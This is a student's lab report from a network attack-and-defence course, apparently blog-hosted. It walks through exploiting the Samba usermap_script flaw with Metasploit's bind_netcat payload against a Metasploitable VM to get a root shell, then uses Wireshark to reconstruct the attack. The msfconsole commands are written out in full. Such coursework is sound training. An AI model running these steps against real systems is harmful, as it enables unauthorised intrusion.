20252807 2025-2026-2 《网络攻防实践》第7次作业
1. 实践内容
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2. 实践过程
本次实验使用的虚拟机如下:
kali——攻击机——(IP)192.168.200.6
Metasploit_Ubuntu——靶机——(IP)192.168.200.9
2.1 使用Metasploit进行Linux远程渗透攻击
·输入命令msfconsole启动Metasploit:

·输入命令use exploit/multi/samba/usermap_script来使用Samba服务的usermap_script漏洞。

此时显示没有载荷配置(No payload)。
·输入命令show payloads查看usermap_script漏洞可用的载荷:

·输入命令set payload cmd/unix/bind_netcat设置攻击载荷为bind_netcat:

·输入命令show options查看攻击载荷的详细配置:

没有配置参数,下面来配置参数:
输入命令
set rhost 192.168.200.9
set lhost 192.168.200.6
来设置渗透攻击参数,随后用show options查看配置是否成功。

·输入命令exploit进行攻击,成功后输入ifconfig查看靶机的ip地址:


输入whoami可以查看到已获得root权限。
2.2 实践作业:攻防对抗实践
实验同第一个相似。
2.2.1 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
重复第一个实验的操作:

输入命令exploit进行攻击:


2.2.2 防守方:使用 wireshark监听获得网络攻击的数据包文件,结合 wireshark分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
打开wireshark,监听数据包:

分析捕包结果可得:
攻击者IP为192.168.200.6;
目标IP为192.168.200.9,端口号为39919
追踪TCP流可得,攻击利用usermap_script漏洞:




攻击者成功之后在命令行输入的信息:ifconfig、mkdir qk、cd qk、touch attack.txt。
3.学习中遇到的问题及解决
问题:无法设置lhost:

解决方法:因为攻击方为本机kali,所以lhost无法设置成功也能够成功攻击。
4.实践总结
通过本次学习,我了解了Linux系统如何使用 Metasploitable 对目标主机进行远程渗透攻击,并对其进行了攻防实践。本次实验同上次实验相似,只不过上次是针对Windows系统的。这次实验也让我更加了解了usermap_script漏洞的攻击和防御。

浙公网安备 33010602011771号